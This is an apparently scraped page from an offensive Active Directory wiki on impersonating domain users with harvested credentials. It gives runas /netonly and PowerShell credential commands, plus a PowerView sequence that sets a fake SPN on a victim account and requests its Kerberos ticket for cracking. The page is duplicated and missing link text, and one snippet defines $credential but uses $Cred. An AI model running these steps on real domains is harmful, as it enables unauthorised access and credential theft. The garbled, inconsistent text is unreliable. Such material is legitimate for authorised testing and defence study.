Impersonation

PreviousShuffling NextMITM and coerced auths

Last updated 1 year ago

Was this helpful?

Impersonation

When credentials are found (through or for instance), attackers try to use them to obtain access to new resources. Depending on the harvested credential material type, the impersonation can be done in different ways.

LM or NT password hash:
RC4 Kerberos key (i.e. NT hash):
non-RC4 Kerberos key (i.e. DES or AES): (alias for overpass-the-hash)
Kerberos ticket:
plaintext password: the techniques listed below

RunAs is a standard Windows command that allows to execute a program under a different user account. When stuffing an Active Directory account's password, the /netonly flag must be set to indicate the credentials are to be used for remote access only.

runas /netonly /user:$DOMAIN\$USER "powershell.exe"

Since the password cannot be supplied as an argument, the session must be interactive.

In Powershell, it is possible to impersonate a user by create a credential object and supplying it with the -Credential argument in the next command.

# Credential object creation (prompted)
$credential = Get-Credential

# Credential object creation (not prompted)
$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)

# Usage
Start-Process Notepad.exe -Credential $credential

Most of 's functions have the -Credential, -Domain and -Server parameters that can be used to explicitly specify the user to run as, the target Domain and and the target Domain Controller. Just like the previous "Powershell" tab, the -Credential option has to be supplied with a credential object.

Here is an example for .

# Credential object creation (not prompted)
$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)

# Usage
Set-DomainObject -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' -Identity 'victimuser' -Set @{serviceprincipalname='nonexistant/BLAHBLAH'}
$User = Get-DomainUser -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' 'victimuser'
$User | Get-DomainSPNTicket -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' | fl

can then be used to make sure the user is correctly impersonated. A standard whoami command will only return the local user rights, not the users impersonated during remote operations (like LDAP queries to the DC).

.\SharpLdapWhoami.exe
.\SharpLdapWhoami.exe /method:kerberos /all

PreviousShuffling NextMITM and coerced auths

Last updated 1 year ago

Was this helpful?

LM or NT password hash:
RC4 Kerberos key (i.e. NT hash):
non-RC4 Kerberos key (i.e. DES or AES): (alias for overpass-the-hash)
Kerberos ticket:
plaintext password: the techniques listed below

runas /netonly /user:$DOMAIN\$USER "powershell.exe"

Since the password cannot be supplied as an argument, the session must be interactive.

In Powershell, it is possible to impersonate a user by create a credential object and supplying it with the -Credential argument in the next command.

# Credential object creation (prompted)
$credential = Get-Credential

# Credential object creation (not prompted)
$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)

# Usage
Start-Process Notepad.exe -Credential $credential

Here is an example for .

# Credential object creation (not prompted)
$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)

# Usage
Set-DomainObject -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' -Identity 'victimuser' -Set @{serviceprincipalname='nonexistant/BLAHBLAH'}
$User = Get-DomainUser -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' 'victimuser'
$User | Get-DomainSPNTicket -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' | fl

.\SharpLdapWhoami.exe
.\SharpLdapWhoami.exe /method:kerberos /all